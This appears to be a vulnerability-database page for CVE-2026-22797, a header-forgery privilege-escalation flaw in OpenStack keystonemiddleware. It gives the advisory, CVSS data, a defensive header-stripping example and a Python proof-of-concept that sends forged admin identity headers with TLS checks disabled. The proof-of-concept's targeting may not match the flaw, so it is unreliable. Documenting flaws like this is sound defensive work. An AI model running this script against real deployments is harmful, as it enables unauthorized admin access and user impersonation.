Security Vulnerability Report
CVE-2026-22797 CVSS 9.9 CRITICAL

CVE-2026-22797

Published: 2026-01-19 18:16:05
Last Modified: 2026-04-15 00:35:42

Description

An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected.
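The defect the description names is an ordering one: a middleware that populates identity headers from a validated token must first discard whatever identity headers the caller supplied, otherwise a downstream service cannot tell validated headers from forged ones. The following is an added, illustrative example and not keystonemiddleware's own code: a minimal WSGI middleware that strips the caller-supplied headers, then sets them only from the validated token. The header list, the token lookup table and the stand-in service are constructed for this demonstration.

```python
# Added, illustrative example: not keystonemiddleware's own code.
# A WSGI middleware that (1) discards any identity headers the caller
# supplied and (2) populates them only from a validated token, so the
# downstream service never sees caller-controlled X-Roles / X-User-Id.
# The token validator and the header list are assumptions for this demo.
import io

# Headers named in the advisory plus a few more identity headers a
# downstream service might trust (assumed list; adjust to the deployment).
FORGEABLE_IDENTITY_HEADERS = (
    "X-Is-Admin-Project",
    "X-Roles",
    "X-User-Id",
    "X-User-Name",
    "X-Project-Id",
    "X-Identity-Status",
)

# Constructed stand-in for token introspection: maps a bearer token to
# the identity the authorization server asserts for it.
_VALID_TOKENS = {
    "tok-alice": {"user_id": "u-alice", "roles": "member", "admin_project": "False"},
}


def header_to_environ_key(header_name):
    """Map an HTTP header name to its WSGI environ key (X-Roles -> HTTP_X_ROLES)."""
    return "HTTP_" + header_name.upper().replace("-", "_")


def strip_identity_headers(environ):
    """Remove every caller-supplied identity header; return the names removed."""
    removed = []
    for name in FORGEABLE_IDENTITY_HEADERS:
        key = header_to_environ_key(name)
        if key in environ:
            del environ[key]
            removed.append(name)
    return removed


def validate_bearer_token(environ):
    """Look up the bearer token; return its identity, or None if absent/invalid."""
    auth = environ.get("HTTP_AUTHORIZATION", "")
    if not auth.startswith("Bearer "):
        return None
    return _VALID_TOKENS.get(auth[len("Bearer "):])


class IdentityHeaderSanitizer:
    """Strip inbound identity headers, then set them from the validated token only."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        strip_identity_headers(environ)  # step 1: never trust the caller's headers
        identity = validate_bearer_token(environ)
        if identity is None:
            start_response("401 Unauthorized", [("Content-Type", "text/plain")])
            return [b"invalid token"]
        # step 2: identity headers now come solely from token validation
        environ["HTTP_X_USER_ID"] = identity["user_id"]
        environ["HTTP_X_ROLES"] = identity["roles"]
        environ["HTTP_X_IS_ADMIN_PROJECT"] = identity["admin_project"]
        environ["HTTP_X_IDENTITY_STATUS"] = "Confirmed"
        return self.app(environ, start_response)


def downstream_app(environ, start_response):
    """Stand-in service that reports the identity headers it received."""
    body = "user={} roles={} admin_project={}".format(
        environ.get("HTTP_X_USER_ID"), environ.get("HTTP_X_ROLES"),
        environ.get("HTTP_X_IS_ADMIN_PROJECT"))
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [body.encode()]


def run_request(headers):
    """Drive the sanitizer with a constructed WSGI environ; return (status, body)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/", "wsgi.input": io.BytesIO()}
    for name, value in headers.items():
        environ[header_to_environ_key(name)] = value
    captured = {}

    def start_response(status, response_headers):
        captured["status"] = status

    body = b"".join(IdentityHeaderSanitizer(downstream_app)(environ, start_response))
    return captured["status"], body.decode()


if __name__ == "__main__":
    # A low-privilege token accompanied by caller-supplied admin headers:
    # the downstream service should see only the token's real identity.
    print(run_request({"Authorization": "Bearer tok-alice",
                       "X-Roles": "admin", "X-Is-Admin-Project": "True"}))
```

The point to take from the example is the order of operations inside `__call__`: stripping happens before validation and before any header is set, so a downstream service that trusts `X-Roles` only ever sees values the middleware itself wrote. A detection check for the unpatched case is the mirror image: log or alert on inbound requests that carry these identity headers at the edge, since a legitimate client has no reason to send them.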

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)


OpenStack keystonemiddleware 10.5 - 10.7 (< 10.7.2)
OpenStack keystonemiddleware 10.8 (< 10.9.1)
OpenStack keystonemiddleware 10.10 - 10.12 (< 10.12.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2026-22797 PoC - OpenStack keystonemiddleware Identity Forgery
# Requires valid OAuth2 token and network access to target
import requests
import json

TARGET_URL = "https://target-openstack.example.com:5000/v3/auth/tokens"
OAUTH_TOKEN = "your_valid_oauth2_token_here"


def exploit_privilege_escalation():
    """
    Exploit CVE-2026-22797 by injecting forged identity headers
    to escalate privileges or impersonate admin users
    """
    headers = {
        "Authorization": f"Bearer {OAUTH_TOKEN}",
        "Content-Type": "application/json",
        # Forged identity headers - the vulnerability
        "X-Is-Admin-Project": "admin",
        "X-Roles": "admin",
        "X-User-Id": "0",
        "X-User-Name": "admin"
    }
    payload = {
        "auth": {
            "identity": {
                "methods": ["oauth2"],
                "oauth2": {"id_token": OAUTH_TOKEN}
            }
        }
    }
    try:
        response = requests.post(TARGET_URL, headers=headers, json=payload,
                                 verify=False, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Response Headers: {dict(response.headers)}")
        if "X-Subject-Token" in response.headers:
            print("[+] SUCCESS: Forged admin token obtained!")
            print(f"Admin Token: {response.headers['X-Subject-Token']}")
            return response.headers.get("X-Subject-Token")
        else:
            print("[-] Failed to obtain forged token")
            print(f"Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


def verify_admin_access(admin_token):
    """Verify obtained token has admin privileges"""
    verify_url = "https://target-openstack.example.com:8774/v2.1/os-simple-tenant-usage"
    headers = {"X-Auth-Token": admin_token}
    response = requests.get(verify_url, headers=headers, verify=False)
    return response.status_code == 200


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-22797 Exploitation Tool")
    print("OpenStack keystonemiddleware Identity Header Injection")
    print("=" * 60)
    admin_token = exploit_privilege_escalation()
    if admin_token and verify_admin_access(admin_token):
        print("\n[!] Full admin access confirmed!")

References

https://launchpad.net/bugs/2129018
https://www.openwall.com/lists/oss-security/2026/01/16/9
http://www.openwall.com/lists/oss-security/2026/01/15/1
http://www.openwall.com/lists/oss-security/2026/01/16/2
http://www.openwall.com/lists/oss-security/2026/01/16/3

Weakness: CWE-290

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22797", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:04.950", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected."}, {"lang": "es", "value": "Se descubrió un problema en OpenStack keystonemiddleware 10.5 hasta 10.7 antes de 10.7.2, 10.8 y 10.9 antes de 10.9.1, y 10.10 hasta 10.12 antes de 10.12.1. El middleware external_oauth2_token no sanea los encabezados de autenticación entrantes antes de procesar los tokens de OAuth 2.0. Al enviar encabezados de identidad falsificados como X-Is-Admin-Project, X-Roles, o X-User-Id, un atacante autenticado puede escalar privilegios o suplantar a otros usuarios. Todas las implementaciones que utilizan el middleware external_oauth2_token se ven afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://launchpad.net/bugs/2129018", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/01/16/9", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/15/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/16/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/16/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/16/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}